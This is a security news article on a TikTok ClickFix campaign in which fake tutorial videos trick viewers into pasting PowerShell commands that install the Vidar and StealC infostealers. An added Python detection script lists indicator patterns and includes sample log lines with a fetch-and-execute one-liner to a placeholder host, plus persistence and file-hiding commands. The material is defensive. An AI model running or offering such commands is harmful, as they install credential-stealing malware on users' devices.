Beware of Malware in TikTok Instructional Videos
Recently, TikTok has increasingly attracted the attention of cybercriminals who are exploiting the platform to disseminate various malicious software. A particularly insidious campaign has emerged, promoting fake instructional videos designed to trick unsuspecting users into downloading infostealers onto their devices through a method known as ClickFix.
This tactic, as detailed by Trend Micro and highlighted by Bleeping Computer, encourages viewers to execute commands that supposedly enable premium features in software such as Windows, Microsoft Office, CapCut, and Spotify. For example, one popular video claims, “Boost Your Spotify Experience Instantly — Here’s How!” and it has amassed nearly 500,000 views.
While the programs discussed in these videos are indeed legitimate, the activation methods are merely facades designed to lead users towards unwittingly infecting their devices with malicious software like Vidar and StealC.
TikTok’s algorithm, which emphasizes high engagement, facilitates the rapid spread of such harmful content. Previously, cybercriminals have utilized trending challenges, like the “Invisible Challenge,” to propagate WASP Stealer malware capable of stealing Discord accounts, passwords, credit card details, and cryptocurrency wallets. In another notorious scheme, fake cryptocurrency giveaways featuring deepfakes of figures such as Elon Musk have deceived users into paying “activation” fees in Bitcoin.
Understanding ClickFix Attacks on TikTok
ClickFix represents a social engineering strategy that capitalizes on fabricated error messages or CAPTCHA prompts, aiming to mislead individuals into executing commands containing harmful code. Users may encounter pop-up alerts claiming there is a technical issue, along with instructions to copy a command (often a PowerShell script) to “resolve” it. This type of attack primarily targets Windows systems, though macOS and Linux are not immune either.
Current TikTok videos in this campaign encourage users to run a PowerShell command, thereby installing Vidar or StealC malware. Vidar is capable of capturing desktop screenshots and extracting a wide array of data, including login details, cookies, credit cards, and crypto wallet information, while StealC zeroes in on web browsers and crypto wallets. Once executed, the pasted command downloads a second PowerShell script that registers itself to launch automatically at device startup, stores its files in hidden directories, and purges temporary folders to escape detection.
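Detection logic for the execution chain described above, as an added example that is not part of the original article or of the Trend Micro report: it scores process-creation log lines (constructed samples with placeholder hosts and paths) against the ClickFix traits named here, namely a pasted PowerShell one-liner that fetches and runs a second stage, startup persistence, and hiding or purging of working files.

```python
import re

# Indicator patterns for the ClickFix tradecraft described above: a pasted
# PowerShell one-liner that fetches and runs a second stage, then sets up
# startup persistence and hides or purges its working files.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b.*"
        r"(?:\biex\b|Invoke-Expression)", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "encoded_command": re.compile(
        r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "startup_persistence": re.compile(
        r"CurrentVersion\\Run\b|\\Startup\\|schtasks(?:\.exe)?\s+/create", re.I),
    "hide_or_purge": re.compile(
        r"attrib(?:\.exe)?\s+\+h|Remove-Item\s+[^;]*\$env:TEMP", re.I),
}

def classify(cmdline: str) -> list[str]:
    """Return the names of every ClickFix indicator matched by one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def scan(lines, min_hits: int = 1):
    """Score process-creation log lines; a line is flagged when it trips at
    least min_hits indicators. Returns (line_no, indicators) pairs."""
    flagged = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if len(hits) >= min_hits:
            flagged.append((n, hits))
    return flagged

# Constructed sample lines in a Sysmon/4688-style "CommandLine=" format;
# the host and paths are placeholders, not indicators from the real campaign.
SAMPLE_LOG = [
    'CommandLine=powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU',
    'CommandLine=powershell.exe -w hidden -ep bypass -c "irm http://placeholder.invalid/p | iex"',
    'CommandLine=powershell.exe -c "New-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name u -Value $env:APPDATA\\x.ps1; attrib +h $env:APPDATA\\x.ps1; Remove-Item $env:TEMP\\* -Recurse"',
    'CommandLine=cmd.exe /c dir C:\\Users',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Raising `min_hits` to 2 keeps the flagged set here but suppresses single-indicator lines such as an administrator's legitimate `-w hidden` scheduled script.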
Identifying Malicious Videos on TikTok
Exercise caution when engaging with instructional content on TikTok, especially unsolicited technical videos. Verify the source and favor legitimate providers, such as official developers. Additionally, be vigilant for signs of AI-generated material, which can disseminate malware rapidly and broadly. Notably, these misleading videos do not embed or deliver malicious code directly; instead, they rely on social engineering through spoken instructions, which makes them considerably harder to identify.